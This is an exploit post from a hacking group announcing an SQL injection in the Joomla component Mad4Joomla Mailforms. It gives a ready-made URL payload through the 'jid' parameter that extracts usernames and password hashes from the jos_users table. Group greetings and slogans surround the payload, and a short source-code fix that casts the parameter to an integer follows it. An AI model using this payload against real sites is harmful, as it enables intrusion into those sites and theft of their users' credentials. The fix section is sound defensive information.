Joomla Component mad4joomla SQL Injection Vulnerability
2008-10-10 23:01:03#############################################################################
# #
# Joomla Component Mad4Joomla Mailforms SQL Injection Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: H!tm@N
[~] Contact: hitman[at]khg-crew[dot]ws
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, urtan, chs, redc00de - [-=Kosova Hackers Group=-]
########################################
[~] ScriptName: "Joomla"
[~] Component: "Mad4Joomla Mailforms (com_mad4joomla)"
[~] Author: "Dipl. Inf. Fahrettin Kutyol"
[~] Author E-mail: "[email protected]"
[~] Author URL: "www.mad4media.de"
########################################
[~] Exploit: /index.php?option=com_mad4joomla&jid=[SQL]
[~] Example: /index.php?option=com_mad4joomla&jid=-2+union+select+1,concat(username,char(58),password)KHG,3,4+from+jos_users--
########################################
[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] United States of Albania
########################################
#
Fixes
http://www.mad4media.de/mad4joomla-mailforms-faq.htmlHow to fix the security vulnerability without reinstalling the component.
Edit the file:
components/com_mad4joomla/mad4joomla.php
Find this:
$jid = mosGetParam($_REQUEST, ‘jid’); [between line 45-70]
Change it to:
$jid = intval(mosGetParam($_REQUEST, ‘jid’));
Save and upload the file again.
In order to submit a new fix you need to be registered.